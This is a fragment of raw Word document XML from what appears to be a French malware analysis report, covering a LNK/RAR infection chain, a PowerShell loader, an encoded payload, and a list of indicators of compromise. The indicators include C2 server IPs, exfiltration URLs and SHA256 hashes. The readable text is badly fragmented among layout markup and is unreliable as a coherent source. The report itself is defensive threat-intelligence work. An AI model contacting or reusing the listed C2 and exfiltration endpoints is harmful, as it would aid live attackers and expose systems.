            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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8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753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2601618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1777521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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7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Endpoint d'exfiltration du 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85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2954678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="587258" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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2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Adresse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958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3033660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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142.111.194.73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060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3037428</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1517621" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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7621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Serveur C2 (port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8640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163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3128033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="167875" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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8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265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3479188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062363" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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3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8"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Fichier LNK</w:t>
                        </w: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  déposé dans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368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3490860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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1ebbdf3671cd5ca25a8a8e7ca2f6e46dd22c631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470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3586503</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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572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3667390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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e01bfcc5c909ae2fd680bf458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6752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3669930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1970068" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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006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Startup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: </w:t>
                        </w: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U061m7RlE5py.lnk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777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4055375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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1c90a1ce25b5078cea3e1c6aaed4f2e1727aa54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8800" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4624705</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4061048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2004894" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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4894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.rar</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="20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exploitant CVE-2025-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9824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4151653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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084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4231905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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fdd3c4a12d57afc085f1fcff9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187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4257698</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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71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8088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289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4779275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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b86f8beec09529afaa8dc89bf0a0e1afd21a2be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39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4786653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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494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4786653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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72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PDF factice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596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4955805</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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2d250281f42a28709a0733ac2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699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5407683</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062998" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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loader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Powershell (cv4, 92,485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801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5486665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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2760fdddbb85327775542e8314e08aa455905d2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904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5494043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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006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5581038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454681" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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68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octets)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108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5663195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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a44a2a46871c76ab98e29a36a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211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6094118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062998" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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9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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Charge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utile</w:t>
                        </w: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  "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sub-encodée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"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3136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6194055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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7d5f786eaaf1f8b1ea8dc12e17d16764e642479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416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6201433</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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518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6284860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1017241" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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24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30"/>
                            <w:spacing w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Zhg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clé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0x2b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620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6370585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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7d0e4bed05f87843aeddb32be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7232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6724915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2096185" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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618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51"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Main.dll décodée depuis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8256" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5560860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6901445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="590608" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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0608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(C2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="459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9280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6901445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="590050" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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005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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Zhg</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="459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0304" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6515988</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6901445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="191293" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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29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71"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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132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6902715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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6111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aa9505993e2171db4324ba5b7e651ef8ec52437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235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6998993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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98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SHA256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337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7077975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://151.158.1.229:118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00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7079245</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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237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9d8e269c7acad1975fb6f8e7f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5424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7257680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="850236" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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0236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61/AHH_bY/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6448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7612010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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9330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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://151.158.1.229:11861/AHH_bY/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747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7619388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="314862" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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8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URL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8496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7619388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1777521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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75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Endpoint d'exfiltration du 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9520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7972448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="587258" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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2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Adresse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0544" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1532889</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8051430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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151.158.1.229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1568" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4606289</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8055198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1599536" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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9536" cy="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Serveur C2 (port </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="-7"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">11861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 w:color="000000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2592" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>935990</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8145803</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="167875" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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8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3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8734055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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Durant les recherches sur les artéfacts liés à </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="27"/>
                          </w:rPr>
                          <w:t xml:space="preserve">dXd9PBI7I7RL9.lnk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seules 2 archives ont été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4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8916693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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récupérées sur VirusTotal mais présentent une caractéristique particulière : elles sont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5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9090048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2007842" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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4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protégées par un mot de passe.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6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9362070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5028025" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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8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65c97f49c32eb9f5281f261e271fe7565f8b0d2fab59f1bf8638e91e8334b132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771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8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873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8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976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8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078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8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1808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8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31590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989974</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="443229"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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443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443229">
                          <a:moveTo>
                            <a:pt x="0" y="167004"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="167004"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="443229"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="443229"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16700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7639"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="167639"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="167004"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="167004"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="443229"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="443229"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="167004"/>
                          </a:lnTo>
                          <a:close/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167639"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16763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692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8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795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8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8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957845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5028025" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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802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5bde73f076171dddfadd3c9587043bb1d8e3bed11a79a020eface0a73808e38c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0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1517673</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="322920" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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9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IOC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1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1792628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="866213" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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2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Adresses IP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2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2061475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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166.0.132.237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3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2238005</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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136.0.141.41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4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2414535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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136.0.141.138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5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2591065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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38.225.209.229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6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2767595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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136.0.141.112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7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2944125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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38.225.209.122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8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3120655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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589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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">23.26.237.80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9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3479823</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="392630" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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6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URL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0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3748670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2412549" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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5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https://166.0.132.237:7044/rcv/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1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3925200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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5853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40"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://136.0.141.41:9580/rcv/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2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4101730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2412549" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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549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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://136.0.141.138:8406/rcv/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3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4278260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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244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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://38.225.209.229:9623/rcv/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43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4735853</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="602180" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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1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5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5004700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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3d371ef71e40c34a75c168d4647db096c2f386499d99a88d4e16b63cd4acda25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6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5181230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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44f6f7ba668fc645129d66353e6f60402822ae929ce54648cae0bba6348a18ea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7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5357760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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718465f44c0680740fb61790eda3d2f4c5218c9de0c560299c580fa1602dc9c7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8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5534290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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8150b2b39fa62fa2de177ed8526c621a3581c0eb481dd9740fc5894ce2b7c13b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9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5710820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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e9d6938c9980cab735e8fb2eaa082ddc6f5dd7f2ff84d8ece01e8caaefdbb930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0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5887350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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65c053030558b4a3588e2590c5c4961a9912180b731686deb3f4c831e765a095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1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6063880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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37b42a83715f7a34e00d3458d4f4b6e53b8c95372677ce020a2e38e80e60ba87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2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6240410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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7200a9f1e1ea51b66ab9c9274e9d8f805633179634e8ff4dcb8ef82bc02518df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3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6416940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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2d9adb7932b7842dfb0e0f453b87e5d28dd4552094105e6340bad009956d8c2b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4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6593470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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4e21c4c97aeb391473ee1e44961676f32de2ee8b56ecb136c1d8081df97c3db4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5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6770000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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6083aac5376b7ca74cc363e0d66f70beaffee543d098c612b820b16fbfb0aa52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6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6946530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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e08dcb80346ded2bb2393a180e3f2612ed4c2ff0d3842390a5b527d003060212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7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7123060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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3c0330f9f934f86b6b70e108ff279a009b88a4a815acbed4adb3664e322e3e59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8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7299590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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2a8ea9f1ad8936fb302243faa64b91c5767df411923715cbdb1a869e3bfd7e6d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9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7476120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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507b2fcdae058cebbd550965b90c44e878d7a2463058c846eeb68f0dc1b48eda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0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7652650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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1c170b7470d507378ddb78e9d66305f1184e965baaf2d27ededb23a318a58953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1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7829180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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bf338d88f60c0d352cd0d1b5e4bc6a1d9f1ac8fe1df48516ec0042cafda821e9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2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8005710</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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f9d2907d6b1de3078a0f111cc98764a92baf5ebd06cc8ab02637a65eff3b7f3a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3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8182240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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f668bd551859007cf2cc2a62bf0bf5414870a04e9782590c9bf85c849ddb308b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4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8358770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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d1d26b0f68e26ac591848796aeef7b9c766442bbff47af8823f9b23d1b588836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5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8535300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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89d20418450b34efe698bd36214100cfa49f60adf1c39a8bc8d65991b1ce2c23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6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8711830</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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ce78748acd8e9be741b143ad716d735dc682bd5a010427a199744b81456f8e35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7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8888360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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378809699c7252dc38b31969b9cc40858397759f15d6e418246dfaba9088fdd1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8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9064890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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7d3ba419751e5ea52b567e1162f6a366bf3d06c44c8956a9f14520e9fb6ed0b1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9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9241420</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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a717dd74c01fcfce35a28f374e1c6f9ded06d6f7b0cc04618ce9454ad64febb8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0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9417950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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19"/>
                          </w:rPr>
                          <w:t xml:space="preserve">dc5082b07eb994ddee343a4080dce0a9ec2e891e5690654e24ae74ba9eabe422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198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300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40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505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608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36710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812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91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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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b01f31c9541579ad34f4e50acafec252eb419f5b1ca98155e0ec84c19d12c9e4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01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942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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82fda6ea769d61aba230c3487787087cec53dd378e22f22a8fb8f0bd5ae83ded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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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77963398e2c5c2fdf9d28d9c5f9c2791cfbf422ba02225e01635dd7f5b31eff8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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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e6bd725a2af981cd2b5c2217c1d7d906369d8daf48f02023fb73635f9e2b9659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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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023c8f8e2a71da2044e3f04ac74c8b3616f417436476cea85222f01119615979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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2a6ce2445c096fc5e577a0af513ba6f4fb8a8097764c7df81824a782e07e7f65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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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c2527a907b209bc4ce911e36b79781ec260f0851eeb466dbeb386d67fec11467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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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22b07d2af98bb180474c33d93861124bbdf9b5dd7e42a8bddc654310469a9a2c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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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68bafc624a4c0d11ef7a949c0077c704aa5ba0a3205fe5b62d29b727b46ccfe4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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
